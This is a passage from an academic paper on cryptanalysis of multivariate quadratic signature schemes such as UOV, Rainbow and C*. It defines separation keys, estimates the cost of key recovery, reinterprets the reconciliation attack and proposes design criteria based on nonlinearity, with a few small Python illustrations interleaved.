provides a unified way of looking at these attacks, and a single measure that can be used as a criterion for the parameters of schemes that have strong separation keys. The next two theorems explain in detail how to mount a generic strong separation key attack, what the complexity of the attack is, and what the best strategy is when the existence of a strong separation key is known. We decided to present the attack by representing the conditions for strong (s, t)–linearity as systems of equations. This way, we obtain systems completely equivalent to the ones that can be obtained using good keys, thus offering another elegant point of view on why good keys exist. Note that this is not the only technique that can be used to recover strong (s, t) separation keys (for example, we can use a probabilistic approach). However, it provides a clear picture of the cases when the existence of a particular strong separation key is devastating for the security of MQ schemes.
Theorem 3: Let it be known that a strong (s, t) separation key exists for a given MQ public key P : F_q^n → F_q^m, with matrix representations P_w of a component w^⊺ · P.
i. The task of finding a strong (s, t) separation key (S_V^⊺, T_W) is equivalent to solving the system of bilinear equations

P_{w^(i)} · a^(j) = 0, i ∈ {1, ..., t}, j ∈ {1, ..., s},   (4)

in the unknown basis vectors w^(i) of the space W, and the unknown basis vectors a^(j) of the space V.
ii. The complexity of recovering the strong (s, t) separation key through solving the system (4) is

O( t · s · n · binom((n − s)s + (m − t)t + d_reg, d_reg)^ω )   (5)

where binom(·, ·) denotes the binomial coefficient, d_reg = min{(n − s)s, (m − t)t} + 1, and 2 ≤ ω ≤ 3 is the linear algebra constant.
Proof: i. From Definition 7, the existence of a strong (s, t) separation key (S_V^⊺, T_W) means that P is strongly (s, t)–linear with respect to two spaces V, W of dimensions Dim(V) = s, Dim(W) = t. So the task is to recover these two spaces, i.e., to recover some bases {a^(1), ..., a^(s)} and {w^(1), ..., w^(t)} of V and W, respectively. From Definition 5 and Proposition 2, w ∈ W and a ∈ V if and only if a is in the kernel of P_w, i.e., if and only if P_w · a = 0. Let the coordinates of the basis vectors {a^(1), ..., a^(s)} and {w^(1), ..., w^(t)} be unknowns. In order to ensure that they are linearly independent, we fix the last s coordinates of a^(j) to 0, except the (n − j + 1)-th coordinate, which we fix to 1; similarly, we fix the first t coordinates of w^(i) to 0, except the i-th coordinate, which we fix to 1. This way we can form the bilinear system (4). The solution of the system will yield the unknown bases of V and W. Note that if we get more than one solution, any of the obtained solutions will suffice. However, it can also happen that the system has no solutions. This is due to the fixed coordinates in the basis vectors, which can be done in this particular manner with probability of approximately (1 − 1/(q − 1))^2. Still, if there are no solutions, we can randomize the function P by applying linear transformations to the input space and the coordinates of the function, since from Proposition 1, this preserves the strong (s, t)–linearity of P.
ii. From i., the system (4) consists of t · s · n bilinear equations in two sets of variables of sizes ν_1 = (n − s)s and ν_2 = (m − t)t, bilinear with respect to each other. The best known estimate of the complexity of solving a random system of bilinear equations is due to Faugère et al. [43], which says
that for the grevlex ordering, the degree of regularity of a
generic affine bilinear zero-dimensional system over a finite
field is upper bounded by

d_reg ≤ min(ν_1, ν_2) + 1.   (6)
Now, we use the F5 algorithm for computing a grevlex Gröbner basis of a polynomial system [44][45], which has a complexity of

O( μ · binom(ν_1 + ν_2 + d_reg, d_reg)^ω ),   (7)

for solving a system of ν_1 + ν_2 variables and μ equations (2 ≤ ω ≤ 3 is the linear algebra constant). Using (6) and (7), we obtain the complexity given in (5).
The complexity given in (5) is clearly not polynomial,
since dreg depends on n. However, it can be substantially
improved using the properties of strong (s, t)–linearity from
Proposition 3. This is shown in the next theorem.
Theorem 4: Let it be known that a strong (s, t) separation key exists for a given MQ public key P : F_q^n → F_q^m, with matrix representations P_w of a component w^⊺ · P.
i. The task of finding a strong (s, t) separation key can be reduced to:
1. Solving the system of bilinear equations

P_{w^(i)} · a^(j) = 0, i ∈ {1, ..., c_1}, j ∈ {1, ..., c_2},   (8)

in the unknown basis vectors w^(i) of the space W, and the unknown basis vectors a^(j) of the space V, where c_1, c_2 are small integers chosen appropriately.
2. Solving the system of linear equations

P_{w^(i)} · a^(j) = 0, i ∈ {c_1 + 1, ..., t}, j ∈ {1, ..., c_2},
P_{w^(i)} · a^(j) = 0, i ∈ {1, ..., c_1}, j ∈ {c_2 + 1, ..., s},   (9)

in the unknown basis vectors w^(i), i ∈ {c_1 + 1, ..., t} of the space W, and the unknown basis vectors a^(j), j ∈ {c_2 + 1, ..., s} of the space V.
ii. The complexity of recovering the strong (s, t) separation key using the procedure from i. is

O( binom((n − s)c_2 + (m − t)c_1 + d_reg, d_reg)^ω )   (10)

where d_reg = min{(n − s)c_2, (m − t)c_1}.
Proof: i. The crucial observation that enables us to prove
this part, is a consequence of Proposition 3. Recall that it
states that strong (s, t)–linearity implies strong (s − 1, t) and
strong (s, t − 1)–linearity. Even more, if P is strongly (s, t)–
linear, with respect to V = Span{a(1) , . . . , a(s) }, W =
Span{w(1) , . . . , w(t) }, then it is strongly (s−1, t)–linear with
respect to V1 , W , where V1 ⊂ V , and strongly (s, t − 1)–
linear with respect to V, W1 , where W1 ⊂ W . Hence, there
exist two arrays of subspaces V ⊃ V1 ⊃ · · · ⊃ Vs−1 and
W ⊃ W1 ⊃ · · · ⊃ Wt−1 , such that P is strongly (s − i, t − j)–
linear with respect to Vi = Span{a(1) , . . . , a(s−i) }, Wj =
Span{w(1) , . . . , w(t−j) }. Thus, we can first recover the bases
of some spaces Vs−c2 , Wt−c1 , and then extend them to the
bases of V, W . Again, similarly, as in the proof of Theorem 3,
we take the coordinates of the basis vectors {a(1) , . . . , a(s) }
and {w(1) , . . . , w(t) } of V and W to be the unknowns, and
again fix the last s coordinates of a(j) to 0 except the
(n − j + 1)-th coordinate that we fix to 1, and fix the first
t coordinates of w(i) to 0 except the i-th coordinate that we
fix to 1. Next, we pick two small constants c1 and c2 , and
form the bilinear system (8). Once the solution of this system is known, we can recover the rest of the basis vectors by solving the linear system (9).
ii. The main complexity of the recovery of the key lies in solving the system (8). Thus, the proof for the complexity (10) is the same as for part ii. of Theorem 3. What is left is to explain how the constants c_1 and c_2 are chosen. First of all, the system (8) consists of c_1 · c_2 · n equations in (n − s)c_2 + (m − t)c_1 variables. We choose the constants c_1 and c_2 such that c_1 · c_2 · n > (n − s)c_2 + (m − t)c_1. Second, since the complexity is mainly determined by the value d_reg = min{(n − s)c_2, (m − t)c_1}, these constants have to be chosen such that this value is minimized. Note that in practice, for actual MQ schemes, we can usually pick c_1, c_2 ∈ {1, 2}.
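The counts in (5) and (10) are easy to tabulate. The sketch below (STS-like toy parameters and the exponent ω = 2.37 are assumptions) evaluates both operation counts and confirms that the reduced strategy of Theorem 4 is dramatically cheaper than solving the full system of Theorem 3:

```python
from math import comb

def cost_full(n, m, s, t, omega=2.37):
    """Operation count from (5): the full bilinear system."""
    d_reg = min((n - s) * s, (m - t) * t) + 1
    return t * s * n * comb((n - s) * s + (m - t) * t + d_reg, d_reg) ** omega

def cost_reduced(n, m, s, t, c1, c2, omega=2.37):
    """Operation count from (10): the reduced system with small c1, c2."""
    d_reg = min((n - s) * c2, (m - t) * c1)
    return comb((n - s) * c2 + (m - t) * c1 + d_reg, d_reg) ** omega

# Toy STS-like parameters with a strong (n - r1, r1) separation key, r1 small:
n = m = 20
r1 = 2
s, t = n - r1, r1
full = cost_full(n, m, s, t)
reduced = cost_reduced(n, m, s, t, c1=2, c2=1)
assert reduced < full   # the Theorem 4 strategy is far cheaper
```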
The most important implication of the last theorem is that when n − s or m − t is constant, we have a polynomial time algorithm for recovering a strong (s, t) separation key.
This immediately implies that for any MQ scheme with this
property we can recover in polynomial time a subspace on
which the public key is linear.
Another implication is that it provides the best strategy for attacking an MQ scheme that possesses some strong (s, t) separation key. Indeed, since we need to minimize d_reg, we simply look for the minimal m − t or minimal n − s such that there exists a strong (s, t) separation key.
Example 4: Consider an (n, n) public key function from the family of STS systems (cf. Example 1.iii). From Table I, for the parameter set (r_1, ..., r_L), we see that the scheme has a strong (n − r_1, r_1) separation key and also a strong (n − r_{L−1}, r_{L−1}) separation key. For the first key, n − s = r_1 is small, so we can choose c_2 = 1 and c_1 such that c_1 n > r_1 + (n − r_1)c_1, i.e., we can choose c_1 = 2. For the second key, m − t = n − r_{L−1} is small, so we can choose c_1 = 1 and c_2 such that c_2 n > r_{L−1} c_2 + (n − r_{L−1}), i.e., we can choose c_2 = 2. Note that for small q it is perfectly fine to choose c_1 = c_2 = 1 in both cases, since then at most q solutions for the strong keys will need to be tried out.
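Example 4's parameter choices can be reproduced mechanically. The sketch below (a toy STS with n = m = 20 and r_1 = 2 is an assumption) searches small c_1, c_2 under the strict equation-count condition from the proof of Theorem 4 and minimizes d_reg:

```python
n = m = 20          # toy STS parameters (an assumption for illustration)
r1 = 2
s, t = n - r1, r1   # the strong (n - r1, r1) separation key from Table I

# Search small (c1, c2) with strictly more equations than variables,
# c1*c2*n > (n-s)*c2 + (m-t)*c1, minimizing d_reg = min{(n-s)c2, (m-t)c1}.
best = None
for c1 in range(1, 4):
    for c2 in range(1, 4):
        if c1 * c2 * n > (n - s) * c2 + (m - t) * c1:
            d_reg = min((n - s) * c2, (m - t) * c1)
            if best is None or d_reg < best[0]:
                best = (d_reg, c1, c2)

d_reg, c1, c2 = best
# Since n - s = r1 is small, Example 4's choice c2 = 1, c1 = 2 comes out,
# with the minimal d_reg = (n - s) * c2 = r1.
assert (c1, c2) == (2, 1) and d_reg == r1
```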
The level of nonlinearity of a given function can be used as a sufficient condition for the nonexistence of a strong (s, t) separation key.
Theorem 5: An (n, m) function f of linearity L(f) ≤ q^(n − r/2) does not possess a strong (s, t) separation key for s > n − r.
Proof: From the linearity given, f does not have any
component whose linear space has dimension bigger than n−r.
Thus, f is not strongly (s, t)–linear for s > n − r, and does
not have a corresponding strong (s, t) separation key.
As a direct consequence, we have the following:
Corollary 1:
1) If (F′, S′, T′) is a strong (s, t) separation key for C∗, then s ≤ 1 and t ≤ 1.
2) UOV using a Maiorana-McFarland bent function does not possess a strong (s, t) separation key for any s > 0.
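To make the linearity bound of Theorem 5 concrete, the following toy sketch (our own illustration, not from the paper; it assumes q = 2, a single Boolean component, and takes the linearity L(f) as the maximum absolute Walsh coefficient) computes L(f) for the bent function f(x) = x1x2 + x3x4 and checks it against the bent value 2^{n/2}:

```python
from itertools import product

n = 4

def f(x):
    # toy quadratic Boolean function x1*x2 + x3*x4 (Maiorana-McFarland bent)
    return (x[0] * x[1] + x[2] * x[3]) % 2

def linearity(f, n):
    # L(f) = max over linear functions a.x of |sum_x (-1)^(f(x) + a.x)|
    best = 0
    for a in product([0, 1], repeat=n):
        corr = sum((-1) ** ((f(x) + sum(ai * xi for ai, xi in zip(a, x))) % 2)
                   for x in product([0, 1], repeat=n))
        best = max(best, abs(corr))
    return best

# a bent function attains the minimum possible linearity 2^(n/2)
assert linearity(f, n) == 2 ** (n // 2)
```

For a bent function, all Walsh coefficients have absolute value 2^{n/2}, which is why the assertion holds.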
V. THE (s, t)-LINEARITY MEASURE FOR MQ SCHEMES
The size of the linear space of the components of an
(n, m) quadratic function clearly provides a measure for the
applicability of the function in MQ systems. Still, the notion
of strong (s, t)–linearity cannot provide a measure for the
existence of all the linear subspaces on which the restriction
of an (n, m) function is linear.
For example, the secret map of UOV is linear on the oil
space, regardless of its nonlinearity, and even when it is of
maximum nonlinearity i.e., when it is bent. The existence of
this space enabled Kipnis and Shamir to recover it in cases
when it is large enough, as in the original Oil and Vinegar
scheme. Furthermore, the existence of such spaces improves
the attack against Rainbow, compared to an attack that only
considers linear spaces of the components.
We will show next that (s, t)–linearity provides a characterization for such subspaces, and thus, provides an improved
measure for the security of MQ schemes.
Example 5: Let P : F_q^n → F_q^m be a UOV public mapping. In Section IV, we saw that the secret map of a UOV scheme belongs to the Maiorana-McFarland class. Thus, immediately from Proposition 7, we conclude that P is (m, m)–linear, i.e., P is linear on the oil space.
Now, similarly to the previous section, we can define a special type of separation key that separates the spaces with respect to which a function is (s, t)–linear.
Definition 8: Let (F, S, T), (F′, S′, T′) ∈ F_q[x1, . . . , xn]^m × GLn(F_q) × GLm(F_q) and let P = T ◦ F ◦ S = T′ ◦ F′ ◦ S′. We call (F′, S′, T′) an (s, t) separation key for P if P is (s, t)–linear with respect to two spaces V and W, Dim(V) = s, Dim(W) = t, and S′ = S_V^⊺, T′ = T_W.
Consequently, any public mapping that was created using an oil-and-vinegar mixing has an (s, t) separation key. Table II gives the (s, t) separation keys for some of the MQ schemes that combine a layered structure with oil-and-vinegar mixing.
TABLE II. EXAMPLES OF (s, t) SEPARATION KEYS FOR SOME MQ CRYPTOSYSTEMS

scheme   | parameters                          | (s, t) separation keys
UOV      | (q, v, o)                           | (o, o)
Rainbow  | (q, v, o1, o2) = (2^8, 18, 12, 12)  | (12, 24), (24, 12)
MQQ-SIG  | (q, d, n, r) = (2, 8, 160, 80)      | (8+8i, 80−8i), i ∈ {0, ..., 9}
MFE      | (q^k, n, m) = ((2^256)^k, 12, 15)   | (2k, 2k), (3k, 2k), (4k, 4k)
ℓIC      | (q^k, ℓ) = (2^k, 3)                 | (2k, 2k), (k, 2k)
EnTTS    | (n, m) = (32, 24)                   | (10, 24), (14, 14), (24, 10)
An interesting case regarding (s, t)–linearity is the C∗ scheme, for which we have the following result.
Proposition 12: Let F : F_2^n → F_2^n be the secret map of C∗ (cf. Example 1.ii) and let gcd(ℓ, n) = d. Then, there exists a (d, n) separation key for these parameters of C∗.
Proof: First, let us consider the equation D_{a,x}(f) = 0 for a nonzero a. A little computation shows that it is equivalent to

ax(a^{2^ℓ−1} + x^{2^ℓ−1}) = 0,

and since we are interested in nonzero solutions we can restrict our attention to

a^{2^ℓ−1} + x^{2^ℓ−1} = 0.

This equation has gcd(2^ℓ − 1, 2^n − 1) = 2^d − 1 roots (see for example [46]). Thus, there exists a space V of dimension Dim(V) = d s.t. D_{a,b}(f) = 0, for all a, b ∈ V. This implies that D_{a,b}(w^⊺ · f) = 0, for any w ∈ F_2^n. Further, from Proposition 8 and Definition 8 it follows that there exists a (d, n) separation key for the given parameters.
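The root count in the proof rests on the identity gcd(2^ℓ − 1, 2^n − 1) = 2^{gcd(ℓ,n)} − 1 (cf. [46]). A quick sanity check of this identity, as a sketch of our own rather than part of the paper:

```python
from math import gcd

def num_roots(l, n):
    # number of nonzero solutions x of x^(2^l - 1) = a^(2^l - 1)
    # in the cyclic group F_{2^n}^* of order 2^n - 1
    return gcd(2 ** l - 1, 2 ** n - 1)

# the count equals 2^d - 1 with d = gcd(l, n), exactly as used in Proposition 12
for l in range(1, 16):
    for n in range(1, 16):
        assert num_roots(l, n) == 2 ** gcd(l, n) - 1
```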
Hence, the best choice for the parameters of the C∗ scheme is d = 1, because in this case the dimension of the space V is the smallest, and it is hardest to separate it. Note that this is analogous to the case of the UOV scheme, where it is also desirable to have a smaller space V. The use of d > 1 was exactly the property exploited by Dubois et al. in [25] to break a modified version of the signature scheme SFLASH with d > 1, before the more secure version with d = 1 was broken due to the possibility to decompose the second order derivative into linear functions [24]. Even then, the authors of [25] noted that the condition d = 1 should be included in the requirements of the scheme, a fact that was overlooked by the NESSIE consortium.
Note further that Proposition 12 implies that the dimension of the space V is invariant under restrictions of the public map (minus modifier). Thus, the SFLASH signature scheme also possesses a (d, k) separation key, where k ≤ n is the number of coordinates of the public key of SFLASH, and this key can equivalently be used to attack the modified version.
Similarly as in the case of strong (s, t) separation keys (cf. Theorem 3 and Theorem 4), we can construct a generic algorithm that finds (s, t) separation keys. This part will be covered in the extended version of the paper. Here we focus our interest on a special type of separation keys, namely, (s, m) separation keys, where the space W is the entire image space of the function. Indeed, schemes including UOV, Rainbow, and Enhanced TTS all possess exactly such keys. We will also show how the properties of (s, m)–linearity provide the best strategy for attacking schemes that possess (s, m) separation keys. Unfortunately, in this case it is more difficult to estimate the complexity of the attacks, since the obtained equations are of mixed nature. Therefore, we leave the complexity estimate for future work. Still, it is notable that we again arrive at systems of equations equivalent to those in the case of good keys.
Theorem 6: Let it be known that an (s, m) separation key exists for a given MQ public key P : F_q^n → F_q^m with matrix representations P_i := P̃_i + P̃_i^⊺ of the coordinate functions p_i.
i. The task of finding an (s, m) separation key (S_V^⊺, T_{F_q^m}) is equivalent to solving the following system of equations

a^(j) P_i a^(k) = 0, i ∈ {1, ..., m}, j, k ∈ {1, ..., s}, j < k
a^(k) P̃_i a^(k) = 0, i ∈ {1, ..., m}, k ∈ {1, ..., s},     (11)

in the unknown basis vectors a^(j) of the space V.
ii. The key can equivalently be found by
1. First solving the system of equations

a^(j) P_i a^(k) = 0, i ∈ {1, ..., m}, j, k ∈ {1, ..., c}, j < k
a^(k) P̃_i a^(k) = 0, i ∈ {1, ..., m}, k ∈ {1, ..., c},     (12)

in the unknown basis vectors a^(k), k ∈ {1, . . . , c} of the space V, for an appropriately chosen integer c.
2. And then solving the system of linear equations

a^(j) P_i a^(k) = 0,
i ∈ {1, ..., m}, j ∈ {1, ..., c}, k ∈ {c + 1, ..., s}, j < k     (13)

in the unknown basis vectors a^(k), k ∈ {c + 1, ..., s} of the space V.
Proof: i. From Definition 8, P is (s, m)–linear with respect to V, F_q^m, where Dim(V) = s. So we need to recover only some basis {a^(1), . . . , a^(s)} of V. From Definition 6 and Proposition 8, the condition for (s, t)–linearity can be written as D_{a^(j),a^(k)} f = 0 for all a^(j), a^(k) ∈ V, i.e., as a^(j) P_i a^(k) = 0. Since D_{a,a} f = 0 for any a, we must write this condition as a^(k) P̃_i a^(k) = 0. We ensure the linear independence of the unknown basis vectors {a^(1), . . . , a^(s)} by fixing the last s coordinates of a^(j) to 0, except the (n−j+1)-th coordinate, which we fix to 1. The probability that we can fix the coordinates of the basis vectors in this way is approximately 1 − 1/(q−1). If the system does not yield a solution we randomize P. In this way we form the system (11). It consists of m·s(s+1)/2 equations in s(n − s) variables.
ii. From Proposition 6, we have that if P is (s, m)–linear with respect to V = Span{a^(1), . . . , a^(s)}, F_q^m, then it is (s − 1, m)–linear with respect to V1, F_q^m, where V1 ⊂ V. Hence, there exists an array of subspaces V ⊃ V1 ⊃ · · · ⊃ V_{s−1}, such that P is (s − i, m)–linear with respect to V_i = Span{a^(1), . . . , a^(s−i)}. Thus, we can first recover the basis of some space V_{s−c} and then extend it to a basis of V. That is, we first solve (12), and then we are left with the linear system (13). What is left is how we choose the constant c. The system (12) consists of m·c(c+1)/2 equations in (n − s)c variables. It is enough to choose c such that m·c(c+1)/2 > (n − s)c, in order to get a unique solution for the basis vectors.
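As an illustration of the conditions (11), the following toy sketch (our own, not from the paper; it works over F_2, omits the secret linear maps S and T, and uses hypothetical sizes v = o = 3, so that the oil space is simply the span of the last o coordinate vectors) checks that every pair of oil-space vectors satisfies a^(j) P_i a^(k) = 0 and a^(k) P̃_i a^(k) = 0:

```python
import itertools
import random

random.seed(1)

v, o = 3, 3          # hypothetical vinegar/oil sizes
n, m = v + o, o
OIL = range(v, n)    # oil coordinates in the secret basis

def random_uov_matrix():
    # upper-triangular matrix P~_i of a quadratic form with zero oil x oil block
    M = [[0] * n for _ in range(n)]
    for j in range(n):
        for k in range(j + 1, n):
            if j in OIL and k in OIL:
                continue                 # no oil*oil monomials in UOV
            M[j][k] = random.randint(0, 1)
    return M

def bilinear(a, M, b):
    # a M b^T over F_2
    return sum(a[j] * M[j][k] * b[k] for j in range(n) for k in range(n)) % 2

Ptil = [random_uov_matrix() for _ in range(m)]
P = [[[(Ptil[i][j][k] + Ptil[i][k][j]) % 2 for k in range(n)] for j in range(n)]
     for i in range(m)]

# every pair of oil-space vectors satisfies the system (11)
for a_bits in itertools.product([0, 1], repeat=o):
    for b_bits in itertools.product([0, 1], repeat=o):
        a = [0] * v + list(a_bits)
        b = [0] * v + list(b_bits)
        for i in range(m):
            assert bilinear(a, P[i], b) == 0
            assert bilinear(a, Ptil[i], a) == 0
```

In a real attack the oil space is hidden by S, and (11) is solved for the unknown basis vectors; the sketch only verifies that the conditions characterize the space.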
Remark 1: Conditions for (s, t)–linearity have been used
in other attacks not involving good keys or system solving.
For example, the analysis of UOV in [1] uses exactly the
conditions of Proposition 8 in order to test whether a subspace
is contained in the oil space. An equivalent condition is also
used in [47] again for analysis of UOV, and the authors’
approach here is a purely heuristic one.
We conclude this part with an interesting result on the
(s, m)–linearity of a random quadratic (n, m)-function.
Proposition 13: Let f be a randomly generated (n, m)-function over F_q. Then, we can expect that there exist q^{s(n−s) − m·s(s+1)/2} different subspaces V such that f is (s, m)–linear with respect to V, F_q^m.
Proof: Let the (n, m)-function f be given. Then f is (s, m)–linear with respect to some space V if and only if there exist s linearly independent vectors a^(1), . . . , a^(s) ∈ F_q^n such that V = Span{a^(1), . . . , a^(s)} and f is linear on every coset of V. Without loss of generality, we can fix s coordinates in each of the a^(k) to ensure linear independence. In this manner, from the conditions of linearity from Theorem 6 we obtain a quadratic system of m·s(s+1)/2 equations in s(n − s) variables. We can expect that such a system, on average, has around q^{s(n−s) − m·s(s+1)/2} solutions. For simplicity, we assume that the coordinates can be fixed in the particular manner. (In general, this is possible with a probability of 1 − 1/(q−1).) Note that all of these solutions span different subspaces. Indeed, suppose (a_1^(1), . . . , a_1^(s)) and (a_2^(1), . . . , a_2^(s)) are two different solutions. Then there exists i such that a_1^(i) ≠ a_2^(i). Then a_2^(i) is not in the span of a_1^(1), . . . , a_1^(s), because the fixed coordinates ensure linear independence. Thus, all the solutions generate different subspaces.
Proposition 13 implies that random quadratic (n, m) functions most probably have an (⌊(2n − m)/(m + 2)⌋, m) separation key. For the case of n = m, this means that there are no nontrivial (s, m) separation keys, but for the case of n = 2m, we can expect that there is a (2, m) separation key, and for n = 2m + 4, even a (3, m) separation key.
Note further that Proposition 13 implies that for n ≈ m², a random quadratic (n, m) function is likely to have an (m, m) separation key. This is exactly the case identified by Kipnis et al. [1] as an insecure parameter set; see [1] for an efficient algorithm for recovering this space.
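The threshold ⌊(2n − m)/(m + 2)⌋ from Proposition 13 can be evaluated directly; the small sketch below (our own illustration, with m = 24 chosen arbitrarily) reproduces the cases listed above:

```python
def s_max(n, m):
    # largest s for which a random quadratic (n, m)-function is expected
    # to admit an (s, m) separation key: s <= (2n - m) / (m + 2)
    return (2 * n - m) // (m + 2)

m = 24
assert s_max(m, m) == 0            # n = m: no nontrivial key expected
assert s_max(2 * m, m) == 2        # n = 2m: a (2, m) key
assert s_max(2 * m + 4, m) == 3    # n = 2m + 4: a (3, m) key
assert s_max(m * m, m) >= m        # n ~ m^2: an (m, m) key (Kipnis et al. [1])
```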
A. On the Reconciliation Attack on UOV
Recall the shape of the internal map of UOV from Example 1.i. From Proposition 7 and Proposition 6, it follows that P is (i, m)–linear for any 1 ≤ i ≤ m. In order to break the scheme, it is necessary to find a vector space V such that P is (m, m)–linear with respect to (V, F_q^m). We will call any such space V an oil space. Ding et al. in [40] propose an algorithm that sequentially performs changes of basis that gradually reveal the space V. They call the algorithm the Reconciliation Attack on UOV. In Figure 1, we present an equivalent version of the attack interpreted in terms of (s, t)–linearity (cf. Algorithm 2 [40]).
Input: UOV public key P : F_q^n → F_q^m.
V_0 ← the zero-dimensional vector space
for k := 1 to m do
    Find a^(k) = (a_1^(k), ..., a_v^(k), 0, ..., 0, 1_{n−k+1}, 0, ..., 0) ∈ F_q^n, where 1_{n−k+1} denotes that the (n − k + 1)-th coordinate is 1, by solving
        a^(j) P_i a^(k) = 0, i ∈ {1, . . . , m}, j < k
        a^(k) P̃_i a^(k) = 0, i ∈ {1, . . . , m}
    Construct a space V_k ⊂ F_q^n with Dim(V_k) = k, s.t.
        • V_k = V_{k−1} ⊕ Span{a^(k)}, and
        • P is (k, m)–linear with respect to (V_k, F_q^m).
end for
Output: An oil space V = V_m of dimension m.
Figure 1. Reconciliation Attack on UOV in terms of (s, t)–linearity
It can be noticed that the Reconciliation attack is exactly an (s, m) separation key attack where the constant c in Theorem 6 is chosen to be c = 1. However, we will show that the choice c = 1 is justified only for the (approximately) balanced version of UOV, and not for every parameter set.
For example, consider the UOV parameter set m = 28 and v = 56. The public key in this case has a (28, 28) separation key. Using the reconciliation attack (equivalently, taking c = 1 in Theorem 6), in order to find a solution for a^(1) one needs to solve a system of 28 quadratic equations in 56 variables. On average we can expect q^{v−m} = q^{28} solutions. From the description of the reconciliation attack it seems that any of the solutions is a "good one", i.e., it leads eventually to the recovery of the space V. This means that we can simply fix v − m = 28 variables and on average get a single solution by solving a system of 28 equations in 28 variables. In other words, this approach seems to work equally well for the balanced version of the scheme (when m = v) and for the unbalanced version.
Now, consider a UOV public key P : F_q^n → F_q^m. By definition it is (m, m)–linear, and also (s, m)–linear for every s ≤ m. We can use Theorem 6 ii. to find the (m, m) separation key by choosing c such that m·c(c+1)/2 > (n − m)c, i.e., c > 2(n/m − 2). We suppose that we have fixed n − m coordinates of the vectors a^(1), . . . , a^(m) ∈ F_q^n to ensure linear independence. Suppose instead that we have chosen c < 2(n/m − 2). Then Step 1 of Theorem 6 ii. will give on average q^{c(n−m) − m·c(c+1)/2} solutions for the basis vectors, and each solution spans a different space of dimension c such that P is (c, m)–linear with respect to it (cf. Proposition 13). From the choice of the basis vectors, only one of these spaces is a subspace of the oil space V we are trying to recover. Thus, if q^{c(n−m) − m·c(c+1)/2} is relatively big, it is infeasible to find the correct subspace. If we choose a wrong space, after several steps (depending on n, m, c), we will not be able to find any new linearly independent vectors. The reason is that from Proposition 13 it is expected that even in the random case such subspaces exist, but their dimension is much smaller than that of the actual oil space. Hence, we must choose at least c ≈ 2(n/m − 2). For example, c = 1 is suitable only for balanced versions where n ≈ 2m, c = 2 can be used for n up to ≈ 3m, and for the practically used parameters of 3m < n < 4m, c should be 4 or even 5.
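The rule of thumb c ≈ 2(n/m − 2) can be tabulated for concrete UOV sizes; the sketch below (our own, with hypothetical parameter choices, evaluating the paper's approximation rather than the exact equation count) reproduces the cases just mentioned:

```python
from math import ceil

def c_needed(n, m):
    # smallest useful c by the rule of thumb c ~ 2*(n/m - 2), at least 1
    return max(1, ceil(2 * (n / m - 2)))

assert c_needed(56, 28) == 1     # balanced-ish case: n = 2m
assert c_needed(84, 28) == 2     # n = 3m
assert c_needed(100, 28) == 4    # 3m < n < 4m: c = 4 (or even 5 for larger n/m)
```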
Remark 2: In [48], Thomae analyses the efficiency of the Reconciliation attack on UOV and concludes that solving the equations from the first step of the attack is quite inefficient. He proposes instead to recover several columns of the good key at once, and introduces an optimal parameter k for the number of columns, which corresponds to our parameter c in Theorem 6. However, the author does not discuss why the parameter is necessary, how to choose it, and what it means for different parameters of UOV. The discussion above answers these questions.
B. Combining strong (s, t)–linearity and (s, t)–linearity
A number of existing MQ schemes combine several paradigms in their design. For example, Rainbow [2] or EnTTS [7] have a secret map with both layered and UOV structure. In other words, these schemes possess both types of separation keys. (Note that we do not talk about the trivial implication of an (s, t) separation key when a strong (s, t) separation key exists.) For example, Rainbow with parameters (v, o1, o2), where n = v + o1 + o2, m = o1 + o2, has an (o2, o1 + o2) separation key with respect to V, F_q^m, but also a strong (o2, o1) separation key with respect to the same subspace V and some W ⊂ F_q^m. We can certainly focus on only one of the keys and, for example, use either Theorem 4 or Theorem 6 to recover it. But since they share the same V, the best strategy is to combine the conditions for both strong linearity and linearity, i.e., to combine both theorems. A little computation shows that in this way we can take both c1 = c2 = 1 in Theorem 4 and c = 1 in Theorem 6, i.e., we indeed arrive at the most efficient case for recovery of V, W.
A similar argument applies to any MQ cryptosystem
that encompasses layered and UOV structure. Notably, the
possibility to use the aforementioned combination is exactly
why the Rainbow band separation attack is much more efficient
than the reconciliation attack.
VI. PRUDENT DESIGN PRACTICE FOR MQ SCHEMES
In the previous sections, we saw that strong (s, t)–linearity and (s, t)–linearity provide a reasonable measure for the security of MQ cryptosystems. Certainly, in some schemes the internal structure is clear from the construction, and such a characterization may seem redundant. However, many schemes contain a hidden structure that is invariant under linear transformations (and thus present in the public map) and that became obvious only after the scheme was broken. Furthermore, sometimes the construction of the internal map lacks essential conditions, as in the case of SFLASH, where the specification was missing a condition on gcd(ℓ, n). We give another example concerning the MQQ-SIG scheme.
Example 6: The designers of the MQQ-SIG signature scheme use in the construction of the internal map a special type of quadratic (2d, d) function f = (f1, . . . , fd) that is balanced when the first d arguments are fixed. They classify such functions depending on how many of the fi are linear, and as a security measure require that all should be quadratic. They further impose the restriction that the rank of the matrix of each fi, i = 1, . . . , d, should be high. While these are completely reasonable requirements, they do not properly reflect the linearity of the function, and are thus not at all sufficient to avoid instances of high linearity. Instead, a better requirement would be to impose a restriction on the rank of any of the components v^⊺ · f, or equivalently to bound the linearity L(f) from above.
Thus, it seems that a good practice is to include conditions about the linearity of the used functions. A nice concise criterion is the behaviour of the derivatives D_a(f) and D_{a,b}(f) of a function f (cf. Propositions 5 and 8) and the nonlinearity measure. As already mentioned, bent functions have the highest possible nonlinearity. However, since all quadratic bent functions over characteristic 2 are from the Maiorana-McFarland class [49], their relatively high (s, t)-linearity can be considered a drawback. Consequently, other functions that have low linearity in both senses (strong (s, t) and (s, t)) should be considered. AB functions have such properties. Unfortunately, Gold functions (cf. C∗) cannot be used because of the presence of symmetry invariants, but it seems a good idea to investigate other AB (or close to AB) functions for applicability in MQ cryptosystems.
VII. CONCLUSION
High nonlinearity of vectorial functions is nowadays a widely accepted criterion in symmetric cryptography. As it turns out, it is also crucial for the security of MQ cryptosystems, and thus can be used as a relevant security measure in their design. Indeed, in this paper we provided a general framework based on linearity measures that encompasses any attack that takes advantage of the existence of linear spaces, and thus can be considered a generalization of all such attacks. That is why we believe that other notions from symmetric cryptography, including resiliency and differential uniformity, can successfully be adapted to the MQ context and further benefit the understanding of the security of MQ cryptosystems.
ACKNOWLEDGEMENT
The first author of the paper is partially supported by FCSE, UKIM, R. Macedonia.
REFERENCES
[1] A. Kipnis, J. Patarin, and L. Goubin, "Unbalanced oil and vinegar signature schemes," in Advances in Cryptology – EUROCRYPT '99. Springer, 1999, pp. 206–222.
[2] J. Ding and D. Schmidt, "Rainbow, a new multivariate polynomial signature scheme," in ACNS, ser. LNCS, vol. 3531, 2005, pp. 164–175.
